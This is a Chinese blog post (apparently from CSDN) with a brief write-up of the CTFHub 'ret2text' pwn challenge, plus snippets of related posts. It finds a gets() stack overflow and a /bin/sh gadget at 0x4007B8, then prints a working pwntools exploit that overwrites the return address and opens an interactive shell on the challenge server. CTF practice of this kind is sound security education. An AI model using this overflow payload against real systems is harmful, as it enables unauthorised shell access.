CTFHUB-PWN-ret2text

最新推荐文章于 2023-04-20 17:33:38 发布
最新推荐文章于 2023-04-20 17:33:38 发布
阅读量152 收藏
点赞数
分类专栏: PWN的学习 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130181014
版权

简单栈溢出

下载文件 checksec看看

64位

放入ida64 查看字符串

 得到shell

然后看看主函数怎么输入

get的危险函数

记住 v4为70h

然后看看shell的地址是多少

 4007B8

然后我们可以开始写payload

from pwn import *
p=remote('challenge-63285d134b7b0e28.sandbox.ctfhub.com',37331)
payload=b'A'*(0x70+0x08)+p64(0x4007B8)
p.sendline(payload)
p.interactive()

 

双层小牛堡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ret2text
Power_shell的博客
03-25 437
Shellcode可以放到bss段然后去执行我们的shell可以控制好几段位置不相邻的代码(gadgets),用rop技术 随着nx保护技术的开启,往堆栈写代码的方式已经发挥不了效果 Rop:Return-oriented Programming(面向返回的编程) 在缓冲区溢出的基础上利用程序已有的小片段,来改变我们程序寄存器变量的值,从而达到控制程序执行流程的效果 所以gadgets是以ret...
[CTFHub] ret2text
最新发布
Lucien_Carr的博客
04-14 583
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。输入超过程序设定的字节数以后,就会发生栈溢出,多出的内容会覆盖返回地址。这个题目中要获得系统的shell,只需要先用垃圾数据填充填满数组的空间,再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8(“/bin/sh”指令的地址),就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权(也就是拿到shell)。
CTFHUB(PWN)Ret2Text
Rt1Text的博客
02-02 4262
64位没有开启任何保护的Ret2Text
PWN · ret2text】——[CTFHub]ret2text
Mr_Fmnwon的博客
04-20 1480
经典的ret2text流程。
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 624
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1178
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
CTFhub-pwn-[ret2text]-writeup
m0_43405474的博客
08-26 1426
关于CTF pwn的简单入门题目,ret2text
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 1941
CTFHub 栈溢出 ret2text exp代码
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1397
CTFpwn的一个关于ret2shellcode的小练习,来自CTFhub
pwn ret2text
young‘s blog
02-06 1439
好久没有写博客了,今天记录一下做ctf-wiki上ret2text的过程,也记录一下学到的东西,一点一点积累成长。 地址:ctf-wiki 源程序也在里面 边看视频边学的,视频地址为: ret2text 程序下载好之后通过checksec查看保护措施: 没有开启canary,32位动态链接程序 知道程序的基本信息后运行一下程序,看看程序都有什么功能。 测试后得知只有一个输入点。 拖进ida分析一下...
好好说话之ret2text
hollk’s blog
06-22 2036
本题为bamboofox-ret2text 题目路径: /ctf-challenges/pwn/stackoverflow/ret2text/bamboofox-ret2text 一、原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadget...
CTFhub pwn
清霂的博客
02-04 1211
这里写目录标题1.ret2text2.ret2shellcode 1.ret2text file checksec ida64 gets函数有栈溢出漏洞,题目为ret2text即返回到text段得到shell shift+f12打开字符串窗口,找到/bin/sh 点进去,选中/bin/sh,右键,交叉引用列表(可以找到使用/bin/sh的地方) 看到把/bin/sh放入rdi后,调用了system x64,64位系统中rdi,rsi,rdx,rcx,r8,r9作为调用函数的前6个参数,如果参数多于6
PWN Ret2text
weixin_42306891的博客
03-21 1716
题目:文件夹内; 工具:IDA,gdb,pwntools; 解题思路:关键在偏移量 ; 解题: 1,IDA大法secure函数 调用了system函数,我们要做的是以此拿到shell即可; Main还使用了gets,存在栈溢出风险,以此为突破; 现在分两种解法; 1,gets函数的地址: 下端点,进行一波操作; 信息如下: S相对...
ctf】ret2text
woodwhale的博客
04-17 5720
PWN ret2text 题目链接:ret2text 参考博客:CTF Wiki 基本 ROP 参考视频:【CTF】Linux PWN入门 Bamboofox社课系列 0x01 下载ret2text文件,复制到 翔哥的van美pwn机 中 查看保护机制 Arch: i386-32-little //文件为32位程序 RELRO: Partial RELRO Stack: No canary found //未开启canary保护 NX: NX enabled
入门到放弃系列 ret2text2
weixin_43489686的博客
09-11 557
ret2text2 这道题依然是入门级别的题目,比上一道题目略难一点,主要区别在于这个题目没有直接给出的后门函数,也就是system函数参数不是/bin/sh,需要自己构造个shell。 首先还是一样先看看这个程序的逻辑,发现这个程序会复述你输入的语句。然后再分别gdb和拖入ida。 main函数点进function里发现逻辑没问题,也有很明显的栈溢出漏洞,其中总偏移量为0x10+8=0x18...
CTFHub[PWN技能树]——栈溢出
BangSen1的博客
01-11 537
栈溢出ret2textret2shellcode ret2text 例行检查,无任何保护 用64位的IDA打开,shift+F12 ,直接看到system和/bin/sh Ctrl+x, Tab 打开 跳转去/bin/sh,Ctrl+x ,转到0x4007B8 查看main函数 get没有输入限制,明显的溢出,溢出到/bin/sh即可,由于自己不会写,根据师兄的代码copy 师兄WP 得到FLAG ret2shellcode 例行检查 无保护 运行一下,给了一个提示 使用IDA64打开,查
ret2text知识点及例题
weixin_44864859的博客
05-19 1380
ret2text 这里涉及到的知识 Stack: No canary found NX: NX enabled ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 1.首先是stack保护措施,如果开启的话在栈中返回地址前放一个随机值,如果被覆盖,程序就会报错退出 2.nx则是 no execution,如果开启的话就不能让ip寄存器指向堆和栈。。。。注意堆和栈是不
mqtt-pwn安装
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值